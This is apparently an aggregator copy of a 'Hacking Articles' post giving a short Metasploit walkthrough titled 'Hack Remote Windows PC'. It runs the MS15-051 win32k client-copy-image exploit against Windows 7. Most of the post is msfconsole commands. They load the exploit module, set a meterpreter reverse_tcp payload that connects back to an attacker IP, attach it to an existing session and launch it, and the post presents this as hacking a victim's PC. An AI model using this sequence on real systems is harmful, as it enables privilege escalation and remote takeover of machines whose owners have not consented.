Quantcast
Channel: Penetration Testing Archives - Hacking Articles
Viewing all articles
Browse latest Browse all 812

Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit

$
0
0

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64..

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms15_051_client_copy_image

msf exploit (ms15_051_client_copy_image)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms15_051_client_copy_image)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (ms15_051_client_copy_image)>set session 1

msf exploit (ms15_051_client_copy_image)>exploit

The post Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit appeared first on Hacking Articles.


Viewing all articles
Browse latest Browse all 812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>